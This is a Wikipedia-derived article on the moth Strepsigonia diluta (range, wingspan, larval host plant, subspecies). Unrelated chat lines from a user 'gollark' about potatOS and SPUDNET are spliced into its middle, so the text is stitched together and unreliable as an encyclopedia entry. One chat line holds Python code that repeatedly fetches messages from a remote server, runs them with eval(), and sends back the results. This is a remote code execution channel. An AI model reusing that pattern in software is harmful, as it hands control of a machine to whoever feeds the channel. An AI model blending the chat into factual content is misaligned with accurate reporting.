Strepsigonia diluta
Strepsigonia diluta is a moth in the family Drepanidae. It is found in the north-eastern Himalaya, China, Taiwan, Java, Sumatra, Peninsular Malaysia, Borneo and Seram.[1]
Strepsigonia diluta | |
---|---|
Scientific classification | |
Kingdom: | |
Phylum: | |
Class: | |
Order: | |
Family: | |
Genus: | |
Species: | S. diluta |
Binomial name | |
Strepsigonia diluta (Warren, 1897) | |
Synonyms | |
|
The wingspan is 27–28 mm (1.06–1.10 in).[2] Adults are pale ochreous fawn with simply falcate (sickle-shaped) forewings in both sexes.[3]
The larvae feed on the leaves of Engelhardia roxburgiana. Mature larvae curl a leaf and fix it with silk to pupate inside.[4]
Subspecies
- Strepsigonia diluta diluta
- Strepsigonia diluta takamukui (Matsumura, 1927) (Taiwan)
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
References
- Savela, Markku. "Strepsigonia diluta (Warren, 1897)". Lepidoptera and Some Other Life Forms. Retrieved August 5, 2018.
- digimuse
- The Moths of Borneo
- Larval Morphology and Host Plants of Drepanidea (Lepidoptera: Drepanidae) in Southern Taiwan Archived 2012-04-25 at the Wayback Machine
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.